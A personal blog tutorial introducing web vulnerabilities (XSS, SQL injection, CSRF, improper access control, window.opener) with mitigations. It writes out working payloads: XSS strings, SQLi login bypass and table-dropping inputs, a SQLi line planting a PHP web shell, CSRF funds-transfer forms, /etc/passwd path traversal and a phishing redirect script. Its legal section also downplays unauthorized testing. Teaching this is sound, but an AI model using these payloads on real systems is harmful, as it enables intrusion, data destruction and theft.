Aaron's Blog

The Basics of Web Security

This was written to help some friends of mine who are becoming interested in cybersecurity to be able to learn. It explains web vulnerabilities including XSS, CSRF, SQLi, IAC, and window.opener.

I may add some more in later to explain other vulnerabilities such as XSHM, session fixation, header injection, and missing security headers, but for now, this seems like a good start.

I would recommend learning about the following before reading this decent-sized blog post:

And here are some terms that you will read in this post. These are all pretty simple terms so you may already know them, but just in case:

One last thing-- the legalities. You are obliged by law to act responsibly when testing websites for vulnerabilities. It is strictly illegal to test any website that you do not own or do not have authorization to test (Computer Fraud and Abuse Act - 18 U.S.C. ยง 1030). By saying this I am not necessarily condoning breaking the law, but the truth is that the vast majority of websites will not take legal action just because someone was testing their website, unless that someone actually did exploit something they found maliciously. When reporting vulnerabilities to websites that were tested illegally, you may be frowned upon. But the truth of the matter is that most people are actually happy that you responsibly disclosed the vulnerability to them without maliciously exploiting it (because by doing so, you are potentially saving them hundreds, thousands, or even millions of dollars-- it could have been maliciously exploited by a blackhat).

There's something called a "bug bounty" that many websites and services have. Basically, they allow you to submit vulnerabilities via responsibly disclosure, and you get paid hundreds or thousands for them (and get awarded swag occasionally!). Larger companies like Google, GitHub, Instagram, Snapchat, Uber, and more usually have bug bounties. It is completely legal to test their websites because they authorize you to. You can Google for "[company] bug bounty" to see if a site you are testing has a bug bounty.

Anyways, here are some important vulnerabilities to know about...

Cross-Site Scripting (XSS)

Cross-Site Scripting (also known as XSS) is a vulnerability in which an attacker is able to inject client-side scripts (such as HTML or JavaScript) into a webpage viewed by others. This happens because the webpage does not sanitize the user's input before writing it to the page, allowing attackers to:

A typical payload for testing for XSS is:


If the webpage does not sanitize the payload, the alert(1) causes the webpage to open a dialog with the contents 1 which is easily noticed by the tester.


Stored XSS

Stored XSS (also known as Persistent XSS) occurs when an attacker makes the server save the payload to a database or file.

For example, Alice could post a new status update on a social media site or set her profile description to Enjoying watching a movie right now <script>alert(1)</script>. If the webpage is vulnerable, the payload will trigger an alert dialog to open whenever Bob or anyone visits the page. The attacker (Alice) could potentially use a payload that sends the victim's session token to their website, allowing the attacker to pwn the victim's account.

This type tends to be more dangerous, because many users visit the webpage with the exploit often, without having to click a link. It requires minimal to no user interaction.

Reflected XSS

Reflected XSS (also known as Non-Persistent XSS) occurs when a webpage parses the user's input and displays a webpage of results without sanitizing the output.

If Alice searched for <script>alert(1)</script> on some search engine and a page of results came up, the title could be something like Search results for "<script>alert(1)</script>". Since the title wasn't sanitized, the payload would be executed. If the payload could be put in the URL like http://searchengine.com/search/?query=<script>alert(1)</script>, then the attacker could simply send the URL to a victim, or make an iframe on their site that loads the page that executes the payload.

Because this type requires the user to either visit the attacker's website or click on a URL, this type isn't as catastrophic as Stored XSS.

Self XSS

Self XSS is technically not a vulnerability, but it could have the same consequences of other types of XSS if properly done. It relies on social engineering to be performed.

For example, if an attacker sent Alice an XSS payload like <script>alert(1)</script> and told him to paste it into a search box and press enter (and he did it), if the webpage is vulnerable, it could execute the javascript, thus having the same consequence of Reflected XSS.

From a technical standpoint, this is not a vulnerability. It usually requires an exceeding amount of user interaction to be performed, so it is of low severity.


If the vulnerable webpage does not santize the user input, <script>alert(1)</script> is sometimes enough.

However, often, vulnerable webpages write the user input inside of an HTML element parameter, like <div id="$input"> (where $input is the user's input). This can be easily exploited still using a payload like "><script>alert(1)</script>. To test, attackers generally use something like '>"><script>alert(1)</script>, because it will close the " or ' so that the payload can be executed.

Another common vulnerability is when it writes into inline JavaScript, like <script>console.log('$input')</script> (where $input is the user's input). This can also easily be exploited using a payload similar to ');</script><script>alert(1)</script>'.

If the webpage does sanitize the characters " and ' when the user input is written to <a href="$input"></a> tags, an attacker can also test for javascript:alert(1) and click on the URL.

The smallest payload possible that opens an alert dialog is <svg/onload=alert(1)>. The / in that payload can also be a space character (), but I usually use /, because some websites that I test do not allow the space character. The actual smallest payload possible for testing is >. If it is vulnerable, when the source is viewed, the character will not be >, but will be the sanitized version (&#x3C;). Testing isn't as fast though, because you have to manually check to see if the character was sanitized or not instead of just hoping an alert dialog opens.

Every now and then, a website that is being tested will convert the string that is being written to the page to uppercase. HTML is case-insensitive, but JavaScript isn't. Thus, to execute JavaScript, you can encode your JS with a tool called JSFck located at https://goo.gl/L11vBB. JSFck encodes JavaScript payloads to use only six different characters: ![]+(). Those characters are the same when uppercased or lowercased, so the JS will still work regardless of the case.

There are some methods for XSS that aren't usually thought of, like XSS via lang cookie. The site developers wouldn't consider lang to be user input because the user doesn't directly enter data into the cookie, but it should be considered to be user input.

A less widely-known method of exploiting this vulnerability is via an SVG (Scalable Vector Graphics) image. Such files can execute JavaScript when rendered, if a script tag is declared:

<svg version="1.1" id="loader-1" x="0px" y="0px"
    width="40px" height="40px" viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space="preserve">
    <script type="text/javascript">

Filename XSS is also possible. On Unix-based operating systems, the filename '>"><svg onload=alert(1)>.png is valid. Thus, an attacker could upload a file to a website with an XSS payload in the name. If the filename is written anywhere on the page, it has a potential to be vulnerable to filename XSS.

I have a file stored on my computer named '>"><svg onload=alert(1)>.svg. The file is an SVG image that executes JavaScript if rendered or if the name is written anywhere on the page. It has served as a useful tool for penetration-testing websites.


In order to not be vulnerable, be sure to sanitize the user's input before writing it to any page. To do this, encode the string with HTML entities, or if the programming language being used has a built-in function for sanitizing strings, use that.

Filenames must be sanitized before being written to the page to protect against filename XSS.

The best option to prevent SVG XSS is to completely block all SVG files. However, converting SVG files automatically to JPG or PNG files is an alternative. A common misconception is that loading an SVG in an img tag instead of an svg tag will prevent the execution of JavaScript. That is not always the case, however. If a user right-clicks on an SVG image loaded in by the img tag, the SVG image will be loaded directly, and the XSS will execute.

A good rule of thumb is this: Whenever you write anything-- any variable, a string, a cookie, a header, or even the time, just stop and think. Is there any way that a user could ever change the value of what is being written to the page? If so, it must be sanitized.

PHP comes with two functions for fixing it, htmlspecialchars($string) and htmlentities($string). There isn't much of a difference, but most developers prefer htmlspecialchars($string).

SQL Injection (SQLi)

SQL Injection (also known as SQLi) is a vulnerability of medium to critical severity (depending on the case) that allows an attacker to inject arbitrary code into an SQL query. This is because the user input was not correctly filtered and sanitized. This can allow the attacker to:

The typical payload for testing for SQL Injection is:

' OR '1'='1

If the website does not properly sanitize the payload before using it in the query, unexpected things could happen. If this were in a login query, the finished query could be something like SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'. Since 1 is always equal to 1, the attacker would be able to login to the user's account.


Unfiltered Escape Characters

This type of SQL Injection vulnerability occurs when the server-side application fails to filter escape characters such as ' or ".

For example, if the server-side application ran this query to login: SELECT * FROM users WHERE username='$input' AND password='$input', an attacker could simply set their username and password to ' OR '1'='1, making the finished query SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'. And that query is always true, because 1 is always equal to 1. So, an attacker would be able to login to an account without a correct username or password.

Or, if the query was SELECT * FROM people WHERE firstname='$input', an attacker could use a payload like '; DROP TABLE people;--, and the entire people table would be deleted. The finished query with that payload would be SELECT * FROM people WHERE firstname=''; DROP TABLE people;--'.

Another common payload for testing is ', because if the escape characters remain unfiltered, the SQL query syntax will be invalid, and the server will report an error.

Blind SQL Injection

Blind SQL Injection occurs when the server-side application does not filter user input before using it in a query, but errors are disabled. Attackers cannot use this to dump the table to the page, and they can't see errors when the payloads don't work.

For example, if the URL http://booksearch.com/search/?query=Harry%20Potter was vulnerable, the attacker could enter a test payload into http://booksearch.com/search/?query=Harry%20Potter' OR '1'='1 and see if the book still came up. If an error page appears, a blank page appears, or the HTTP request responded with error 500, then the website is probably vulnerable to Blind SQL Injection.


It is exploited in many different ways, depending on the vulnerable page and how the query is implemented. The typical payload for testing for SQL injection is ' OR '1'='1. To drop a table and erase the data in it, an attacker would use a payload similar to '; DROP TABLE tablename;--.

Depending on the circumstance, an attacker could actual execute any SQL command they wanted, so long as it was formated like '; YOURCOMMANDHERE;--. So, using that payload format, an attacker could execute the SQL comand UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3 INTO OUTFILE '/var/www/html/exec.php', and it would create a file caled exec.php that can be used as a backdoor (simply make an HTTP GET request to the page /exec.php?cmd=[your command here]).


Most programming languages include support for sanitizing user input for SQL queries, like PHP's mysqli_real_escape_string($string) function. Some programming languages even have modules or classes built to prevent SQL injection, like prepared statements.

Always assume that every one of your users is trying to hack you. Assume all user input is evil, and that if you use it an SQL query, they will try to manipulate it in any and every way possible to try to break your server.

Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (also known as CSRF or XSRF) is a vulnerability that, when properly exploited, allows an attacker to evade cross-site request restrictions like Same-Origin (a browser policy that prevents JavaScript on one domain from accessing or making HTTP requests to another domain). It is typically low to medium severity, but in some cases, it can be of critical severity (if a server control panel was vulnerable, for example). With this vulnerability, an attacker could:

In layman's terms, CSRF is a vulnerability that allows an attacker to force a victim to send an HTTP request to the vulnerable website without their consent or knowledge, with the intent to perform an action as the victim.

For example, if a social media website has no CSRF protection, an attacker could make an iframe that performs an HTTP request to the website to make a new post on their account.



Suppose there was a bank website with an API endpoint to transfer money to someone else's account, but with no CSRF protection. To transfer the money, one would simply have to perform the HTTP request:

GET https://bank.com/transfer.php?to=alice&amount=100

In this example, pretend Alice noticed that the transfer API endpoint was vulnerable to CSRF. So, Alice decided to put the following HTML code on her website:

<iframe src="https://bank.com/transfer.php?to=alice&amount=100"></iframe>

If Bob were to visit Alice's website, an iframe would load the transfer.php page (it would send the HTTP GET request), and he would end up sending $100 to Alice without his consent.

Alice could even send Bob an email with the following HTML code in its contents:

<img src="https://bank.com/transfer.php?to=alice&amount=100" width="0" height="0" border="0">

This would load an image with the size 0x0 when Bob opened the email. When the image is loaded, an HTTP GET request is sent to the URL. The image isn't valid so it wouldn't load, but that doesn't matter because the HTTP GET request has already been sent. Bob would end up sending $100 to Alice just by opening an email.


After Alice hacked Bob's account for money, the bank website realized that they are vulnerable to CSRF. So, the banking website naively decides to solve this problem by only allowing HTTP POST requests instead of HTTP GET. They thought POST would solve the problem, because iframes can't make POST requests. Or can they?

POST https://bank.com/transfer.php


What the bank website did not know is that POST CSRF is only different than GET CSRF because of how the attack is executed by the victim. All the attacker has to do is make a form that submits to the iframe. So, Alice easily defeated the website's attempt to protect users against CSRF.

<iframe style="display:none" name="csrf-frame"></iframe>

<form method="POST" action="https://bank.com/transfer.php" id="csrf-form" target="csrf-frame" style="display:none">
    <input type="hidden" name="to" value="alice">
    <input type="hidden" name="amount" value="100">
    <input type="submit" value="submit">


The JavaScript in the code submits the form. The form makes a POST request to the transfer page, but because we set target="csrf-frame", it does the POST request inside of the iframe. And so yet again, Bob unknowingly sends another $100 to Alice, without his consent.

CSRF with Other HTTP Methods

While CSRF with other HTTP request methods such as PUT and DELETE is usually not possible, it should never be relied upon and should not be considered secure. There are many factors that could cause such a CSRF vulnerability to be exploitable:

In short, do not trust that PUT and DELETE HTTP methods are safe from CSRF, because often enough, they are not.

Login and Logout CSRF

Login CSRF is a lesser-known type of CSRF vulnerability. It is merely a POST CSRF vulnerability that is specifically in a login form. While some would argue that forcing a victim to log in to the attacker's account is pointless, that is simply not the case. The exploitation of this vulnerability plays out similar to this: An attacker would log in the victim into the attacker's account. Unaware of the fact that they are logged in to the attacker's account, the victim would submit sensitive information to the website (a credit card number, for example), and it would be stored in say, the settings of the attacker's user. Then, after waiting a while, the attacker would log in to their own account, check the settings, and get the credit card number that the victim submitted to the website (or any other information). And the attacker has now successfully exfiltrated the user's sensitive information.

Logout CSRF is renowned by many bug bounty program administrators to be one of the most annoying types of reports possible to receive. This is because not only do so many report logout CSRF, but it is also not important from a security standpoint. While there are a few exceptions, the vast majority of the time, all an attacker can do with logout CSRF is, well, annoy the victim by logging them out. However, this vulnerability can be chained with an open redirect vulnerability on logout in the following way: First, the attacker would log out the user via CSRF. Using the open redirect vulnerability on logout, they would redirect the victim to their own login form. The victim would enter in their credentials to sign in, but the credentials would be sent to the attacker instead of the website. This is an edge case, and it is decently rare to find a website with this kind of vulnerability for phishing users like this.

Chaining CSRF with XSS

A CSRF vulnerability can, in fact, often be chained with another XSS vulnerability. When it is possible, the severity of these vulnerabilities escalates quite quickly.

Reflected XSS can be triggered by creating an iframe to load the vulnerable page if it is not protected by a CSRF token. Using this attack vector, an attacker can force the victim to execute arbitrary JavaScript code on another domain just by having the victim visit their website.

An attacker can utilize a POST CSRF vulnerability when chained with a stored XSS vulnerability to force a user to, just by visiting the attacker's website, store arbitrary JavaScript code on the affected website.

Another method of chaining CSRF with XSS is to, via XSS, get the CSRF token, and make a CSRF request to the same domain, using the exfiltrated CSRF token. One example of this is how Samy Kamkar's fast-spreading worm used XSS on a social media platform to obtain the CSRF token to forge HTTP requests that make new posts on the social media platform that contains the XSS payload.



<iframe src="https://bank.com/transfer.php?to=alice&amount=100"></iframe>


<iframe style="display:none" name="csrf-frame"></iframe>

<form method="POST" action="https://vulnerablewebsite.com/" id="csrf-form" target="csrf-frame" style="display:none">
    <input type="hidden" name="parameter" value="content">
    <input type="submit" value="submit">


Login CSRF Simply use the HTTP POST code and modify it to log in the user into the attacker's account.

Logout CSRF Use the HTTP GET code to visit the URL that logs out the user.

Chaining CSRF with XSS: Configure the CSRF exploit code to either make a GET request or a POST request to the XSS-vulnerable page with the XSS payload in either the URL parameters or the body of the request.


To mitigate this vulnerability, create a unique CSRF token (a nonce), and store it in the cookies. Whenever a POST request is made (or a GET request, if applicable), verify that the URL parameters, the body of the request, or HTTP headers that were sent with the request contain the same CSRF token as the one stored in the cookies. This means that to make requests, the attacker must somehow predict what the CSRF token of the victim is and use it in the HTTP request, which is near to impossible.

In addition to the above solution, it is advised that the website validates the Origin or Referer header to ensure that HTTP request came from the same domain. This doesn't always work, however. For example, if the CSRF vulnerability is chained with the XSS vulnerability, and the XSS is run on the same domain, it can perform the CSRF requests still. Also, if the website is vulnerable to DNS Rebinding, this protection is useless.

Always be sure to protect login forms with CSRF tokens. Periodically regenerate CSRF tokens too, to prevent guessing.

Improper Access Control (IAC)

Improper Access Control (also known as IAC) is a vulnerability of medium to critical severity that occurs when a website does not properly restrict a resource from an attacker. The aformentioned resources can include password files, configuration files, logs, /etc/shadow and /etc/passwd on Unix-based operating systems, and any other potentially sensitive files. It also includes resources such as a page or website that is typically password protected. When an attack is carried out on an IAC-vulnerable website, the attacker may be able to:

Due to the fact that this vulnerability is very broad, only a couple types will be covered. This vulnerability is quite simple and easily comprehensible, but is different from case to case. Therefore, it is difficult to demostrate every way that this vulnerability occurs.

There is no typical payload for testing, as this attack is not injection-based like XSS and SQLi


Improper File Access Control

An application is vulnerable to improper file access control if it allows an attacker to read or write to arbitrary files or folders.

Take below as an example:


Often, when URLs have a parameter named file or something similar, they are vulnerable to IAC. An attacker could insert a sensitive file into the URL parameter such as /etc/passwd and potentially be able to download it, if it doesn't verify that the requested file is "legal" to download ("legal" meaning "intended to be downloaded by the website").


An attacker could use this to download configuration files, logs, the website's source code, etc. This type of vulnerability is typically of medium severity, because while it does not directly enable remote code execution (also known as RCE), it can be used to download sensitive files such as configuration files, logs, the website's source code, or even in some cases, private keys or ssh keys.

If the path to the downloaded file is just taken directly from the file parameter (an absolute path to the file), an attacker can just enter in /etc/passwd to download the passwd file. However, if the path to the downloaded file is relative (if the file parameter is appended to the current path), then an attacker must "go back" a few directories to get to the root directory before accessing /etc/passwd.

For example, if $file$ is replaced by the file parameter from the URL in the string /var/www/html/$file$, then to access /etc/passwd, an attacker must set file to ../../../etc/passwd so that the path generated is /var/www/html/../../../etc/passwd (that will lead to the file /etc/passwd).

This type of IAC can also be exploited to write to files or folders. If an attacker found an access control vulnerability in the website that allowed them to write to arbitrary files, they could potentially add an ssh key, add a user, or modify config files. If the vulnerable website can write to files or folders, the severity is quickly potentiated to critical severity, as it is on the same level as remote code execution, which can lead to total server compromise by the attacker.

Improper Web Resource Access Control

This type of the vulnerability occurs when a normal user can access, without special permissions or further authentication, a sensitive page, configuration, or logs that only an administrator should be able to access.

For example, if an administrator panel located at the page /panel/ should only be able to be accessed by an administrator or a user with special privileges can be accessed without any special privileges by a normal user without authentication just by visiting /panel/, then it is vulnerable.

This type of vulnerability is relatively self-explanitory and simple, and therefore does not need further description.


Improper file access control vulnerabilities are typically used to download sensitive files, and those sensitive files are used to exploit the vulnerable website further. For example, an attacker could download a configuration file that contains credentials for an SQL server, /etc/passwd, or an attacker could potentially download ssh keys or private keys and use them to ssh into the server hosting the website.

It's typically a good idea to test download pages, and any page that references a parameter named similar to file with different payloads such as ../../../etc/passwd and /etc/passwd.

If a settings page, for example, references users by their username in the URL parameter, it is a good idea to try entering another user's username, and verify whether or not you are able to view/modify their settings.


Logical validation is typically performed in order to secure direct object references. Types of validation may include minimum and maximum bound checking, pattern (ex. social security numbers, filenames), and acceptable characters (ex. no / chars).

Whitelist validation is another method of mitigation that involves checking the referenced object against a list of allowed files or objects. If the list contains the object, it may continue accessing. If it is not whitelisted, then deny access.

The last method uses indirect object references to mitigate. Basically, instead of directly using objects like filenames in URLs, it involves "file ids" (integers that correspond to the filenames). Since the attacker has no way of adding file ids, they can't access arbitrary files like /etc/passwd.

In cases like a user settings page where an attacker could potentially insert another user's name into a URL and edit their settings, authentication should be performed to ensure that the user modifying the settings has the correct permissions to do so.


There is a lesser-known vulnerability that most people just call "the window.opener vulnerability". When a webpage opens a new tab or window, if it is not properly protected, the webpage that is opened can write to the opener's window.location (even to a cross-origin site). Therefore, if properly exploited, once a user clicks on a link that opens a malicious website in a new tab, the new tab could write to window.opener.location, and while the victim's attention is focused on the new page that opened, they won't notice the tab that opened the malicious website being redirected to a phishing website.

While some may argue that this is social engineering and not a vulnerability, that is simply not the case. By definition, window.opener is in fact a vulnerability. It is one that enables social engineering.


The below script first checks if window.opener is set, and if it is, it sets window.opener.location to the location of an example malicious website.

    if (window.opener) {
        window.opener.location = 'https://maliciouswebsite.com/fakepage.php';

To test for this vulnerability, wherever users can enter in arbitrary links or URLs, try entering in my website https://arinerron.com. I have a script on my website that will check for window.opener, and if it is set, it redirects the opened page to https://arinerron.com/hacked.


To mitigate this vulnerability, whenever a URL is opened in a new tab, be sure to null the referrer by adding the rel="noopener noreferrer" to <a> elements. While this vulnerability is not severe, it's probably worth fixing, in order to add an extra layer of protection for users.

Welp, that's it!

There are a lot more types of vulnerabilities out there. I've only scratched the surface in this post of what's possible. If this post got you interested in web security, I'd recommend checking out this enormous list of vulnerabilities that there still are to learn about. Also, if you want to try testing for XSS vulnerabilities legally, check out Google's XSS Game. Good luck! :)

Written by Aaron E. (aka: Arinerron) - September 2, 2017